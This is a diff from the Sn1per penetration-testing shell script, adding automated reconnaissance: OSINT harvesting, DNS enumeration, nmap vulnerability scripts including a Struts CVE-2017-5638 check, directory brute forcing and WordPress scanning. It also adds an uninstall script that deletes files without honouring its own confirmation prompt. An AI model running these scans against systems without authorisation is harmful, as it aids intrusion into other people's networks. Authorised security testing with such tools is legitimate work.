if [ "$MODE" = "nuke" ]; then
if [ "$OPT1" = "report" ]; then
sniper $(realpath $TARGET) $MODE | tee $LOOT_DIR/sniper-$(basename $TARGET)-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
loot
exit
fi
for a in `cat $(realpath $TARGET)`; do
@@ -757,6 +1083,8 @@ if [ "$MODE" = "nuke" ]; then
echo -e ""
echo -e ""
done
loot
stop services
exit
fi
@@ -780,7 +1108,8 @@ then
echo -e "$OKGREEN + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +$RESET"
whois $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +$RESET"
theharvester -d $TARGET -l 100 -b bing 2> /dev/null
theharvester -d $TARGET -l 200 -b all 2> /dev/null
metagoofil -d $TARGET -t doc,pdf,xls,csv,txt -l 200 -n 50 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html
echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET"
dig -x $TARGET
dnsenum $TARGET
@@ -1015,11 +1344,13 @@ else
fi
if [ "$MODE" = "web" ];
then
echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
nmap -A -Pn -T5 -p 80 -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
nmap -A -Pn -T5 -p 80 -sV --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
dirb http://$TARGET
#dirb http://$TARGET
python $PLUGINS_DIR/cansina/cansina.py -u http://$TARGET:$PORT -p $PLUGINS_DIR/cansina/dirbuster-quick.txt
echo -e "$OKGREEN + -- ----------------------------=[Enumerating Common Web Software]=--------- -- +$RESET"
clusterd -i $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
wpscan --url http://$TARGET --batch
echo ""
@@ -1220,9 +1551,12 @@ else
if [ "$MODE" = "web" ];
then
echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
nmap -A -sV -T5 -Pn -p 443 --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
nmap -A -sV -T5 -Pn -p 443 --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
dirb https://$TARGET
#dirb https://$TARGET
python $PLUGINS_DIR/cansina/cansina.py -u https://$TARGET:$PORT -p $PLUGINS_DIR/cansina/dirbuster-quick.txt
echo -e "$OKGREEN + -- ----------------------------=[Enumerating Common Web Software]=--------- -- +$RESET"
clusterd --ssl -i $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
wpscan --url https://$TARGET --batch
echo ""

30
uninstall.sh Normal file
View File

@@ -0,0 +1,30 @@
#!/bin/bash
# Uninstall script for sn1per
#
# VARS
OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'
RESET='\e[0m'
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
echo ""
INSTALL_DIR=/usr/share/sniper
echo -e "$OKGREEN + -- --=[This script will uninstall sniper and remove ALL files under $INSTALL_DIR. Are you sure you want to continue?$RESET"
read answer
rm -Rf /usr/share/sniper/
rm -f /usr/bin/sniper
echo -e "$OKORANGE + -- --=[Done!$RESET"
echo -e "$OKORANGE + -- --=[To run, type 'sniper'! $RESET"